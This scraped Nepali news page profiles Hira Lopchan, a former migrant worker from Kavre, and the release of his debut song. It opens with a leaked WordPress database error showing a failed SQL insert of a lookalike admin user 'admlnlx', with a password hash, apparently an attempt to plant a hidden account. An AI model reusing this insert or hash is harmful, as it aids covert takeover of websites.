WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUIwSdmxfuio4YDmnRO9YlHh8KJuJ20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 04:51:30', '', 'admlnlx', 'admlnlx')
काभ्रे । काभ्रेको रोशी गाउँपालिकामा जन्मिएका हिरा लोप्चन ६ बर्षको हुँदै बाबु बितेपछी सबै आफ्नो जिम्मेवार आफैले पुरा गर्नु पर्यो ।
वि. सं. २०७० सालमा एसएलसि पास गरि काठमाडौ पसे । काठमाडौ त्यो पनि नयाँ ठाउँ, नयाँ परिबेश । उनले धेरै संघर्ष गर्नु पर्यो । जसोतसो + 2 गरे । काठमाडौंमा रोजगार खोज्न धेरै भौतारिए । केही गर्न नसकेर बिदेश जाने निर्णय गरे । उनी वैदेशिक रोजगारको लागि मलेशिया लागे । बिदेश मै रहेपनी आफुलाई आफ्नो संस्कार,संस्कृति गीत संगीतको माध्यमबाट उजागर गर्नु पर्छ भन्ने लागिरह्न्थ्यो ।
अन्ततः उनको सपना पूरा भएको छ ।उनले आफ्नो संस्कृति जोगाउनु पर्छ,जगेर्ना गर्नुपर्छ भन्ने लागेर कोसेली स्वरुप पहिलो प्रस्तुति “ह्याङ्ला ब्रेल्साङ” गीत बजारमा ल्याएका छन । उनले गीत सबैले मन पराउनेमा विश्वस्त रहेको बताए । गीतमा गायक एंव संगीतकार मिलन लो को शब्द, संगीतमा तयार पारीएको गीतमा गायक एंव संगीतकार जोगलाल लामाले संगीत संयोजन गरेका हुन । गीतमा गायिका सुस्मिता स्याङ्तान र उनै गायक एंव संगीतकार जोगलाल लामाको स्वर रहेको छ । सेलो सरगम रेकर्डिङ स्टुडियोमा रेकर्ड गरिएको उक्त गीतमा दिपेश प्रधानले मिक्सिङ गरेका हुन ।
https://www.youtube.com/watch?v=1qiaOHvouXw